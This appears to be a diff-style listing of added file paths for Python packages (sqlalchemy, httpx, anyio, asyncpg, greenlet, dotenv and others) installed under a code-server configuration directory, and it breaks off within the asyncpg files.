+/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/pool/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/schema.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/asyncio +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/asyncio/engine.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/asyncio/result.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/asyncio/session.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/asyncio/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/asyncio/scoping.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/asyncio/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/asyncio/exc.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/horizontal_shard.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/hybrid.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/indexable.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/compiler.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/baked.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/serializer.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/mutable.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/associationproxy.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/orderinglist.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/mypy +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/mypy/util.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/mypy/apply.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/mypy/plugin.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/mypy/names.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/mypy/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/mypy/infer.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/mypy/decl_class.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/declarative +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/declarative/extensions.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/declarative/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/automap.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/ext/instrumentation.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/exc.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/create.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/characteristics.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/util.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/events.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/_py_util.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/result.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/_py_row.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/row.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/url.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/cursor.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/reflection.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/default.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/processors.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/interfaces.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/mock.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/strategies.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/engine/_py_processors.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/_collections.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/_py_collections.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/deprecations.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/langhelpers.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/typing.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/compat.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/_concurrency_py3k.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/queue.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/topological.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/_has_cy.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/tool_support.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/concurrency.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/util/preloaded.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info/WHEEL +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info/REQUESTED +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info/licenses +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info/licenses/LICENSE.md +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info/INSTALLER +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info/entry_points.txt +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info/METADATA +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx-0.28.1.dist-info/RECORD +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/pytest_plugin.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/to_thread.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/functools.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/_trio.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/_asyncio.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/py.typed +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/to_interpreter.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/streams +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/memory.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/stapled.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/buffered.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/tls.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/file.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/text.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/lowlevel.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/from_thread.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/to_process.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_synchronization.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_fileio.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_resources.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_testing.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_exceptions.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_tasks.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_asyncio_selector_thread.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_signals.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_typedattr.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_tempfile.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_eventloop.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_contextmanagers.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_streams.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_subprocesses.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_sockets.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/abc +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_resources.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_testing.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_tasks.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_eventloop.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_streams.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_subprocesses.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_sockets.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/typing_extensions-4.15.0.dist-info +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/typing_extensions-4.15.0.dist-info/WHEEL +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/typing_extensions-4.15.0.dist-info/licenses +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/typing_extensions-4.15.0.dist-info/licenses/LICENSE +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/typing_extensions-4.15.0.dist-info/INSTALLER +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/typing_extensions-4.15.0.dist-info/METADATA +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/typing_extensions-4.15.0.dist-info/RECORD +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/WHEEL +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/top_level.txt +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/licenses +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/licenses/LICENSE +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/INSTALLER +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/entry_points.txt +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/METADATA +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/RECORD +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/WHEEL +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/top_level.txt +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/REQUESTED +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/licenses +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/licenses/LICENSE +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/INSTALLER +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/METADATA +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/RECORD +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_status_codes.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_urls.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/__version__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_multipart.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_decoders.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_urlparse.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/py.typed +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_client.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_exceptions.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_config.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_main.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_utils.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_transports +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_transports/wsgi.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_transports/asgi.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_transports/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_transports/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_transports/default.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_transports/mock.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_api.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_auth.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_content.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_types.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpx/_models.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info/WHEEL +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info/top_level.txt +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info/REQUESTED +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info/licenses +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info/licenses/LICENSE +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info/INSTALLER +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info/entry_points.txt +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info/METADATA +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/python_dotenv-1.2.1.dist-info/RECORD +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/soupsieve +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/soupsieve/util.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/soupsieve/css_parser.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/soupsieve/py.typed +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/soupsieve/pretty.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/soupsieve/__meta__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/soupsieve/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/soupsieve/css_match.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/soupsieve/css_types.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpcore-1.0.9.dist-info +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpcore-1.0.9.dist-info/WHEEL +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpcore-1.0.9.dist-info/licenses +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpcore-1.0.9.dist-info/licenses/LICENSE.md +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpcore-1.0.9.dist-info/INSTALLER +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpcore-1.0.9.dist-info/METADATA +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/httpcore-1.0.9.dist-info/RECORD +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet_exceptions.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TBrokenGreenlet.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TMainGreenlet.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TStackState.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/slp_platformselect.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TThreadState.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/_greenlet.cpython-312-x86_64-linux-gnu.so +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet_thread_support.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet_internal.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TThreadStateDestroy.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/PyGreenlet.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet_allocator.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_ppc_macosx.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_arm32_ios.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_arm64_masm.obj +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_ppc_aix.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_ppc64_linux.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_arm32_gcc.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_ppc64_aix.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_x32_unix.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_x86_unix.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/setup_switch_x64_masm.cmd +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_arm64_masm.asm +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_mips_unix.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_ppc_linux.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_csky_gcc.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_s390_unix.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_x86_msvc.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_x64_msvc.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_alpha_unix.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_sh_gcc.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_aarch64_gcc.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_riscv_unix.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_arm64_msvc.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_amd64_unix.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_m68k_gcc.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_loongarch64_linux.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_x64_masm.asm +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_sparc_sun_gcc.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_ppc_unix.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/platform/switch_x64_masm.obj +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/PyModule.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet_refs.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet_compiler_compat.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TThreadStateCreator.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TExceptionState.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet.h +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/PyGreenlet.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TGreenletGlobals.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/CObjects.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TGreenlet.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TPythonState.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet_msvc_compat.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet_cpython_compat.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/PyGreenletUnswitchable.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TUserGreenlet.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_weakref.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_gc.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/fail_cpp_exception.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_stack_saved.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_tracing.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_leaks.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/_test_extension.cpython-312-x86_64-linux-gnu.so +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_throw.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_extension_interface.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/_test_extension.c +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_cpp.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/_test_extension_cpp.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/fail_switch_three_greenlets.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/fail_slp_switch.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_greenlet.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_version.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/leakcheck.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/fail_initialstub_already_started.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/fail_clearing_run_switches.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_greenlet_trash.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/fail_switch_three_greenlets2.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_generator.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_contextvars.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/test_generator_nested.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/_test_extension_cpp.cpython-312-x86_64-linux-gnu.so +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/tests/fail_switch_two_greenlets.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/greenlet_slp_switch.hpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet/TGreenlet.cpp +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/dotenv +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/dotenv/variables.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/dotenv/__main__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/dotenv/version.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/dotenv/py.typed +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/dotenv/parser.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/dotenv/ipython.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/dotenv/main.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/dotenv/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/dotenv/cli.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connection.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg/types.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connresource.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg/cluster.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg/utils.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/settings.pyx 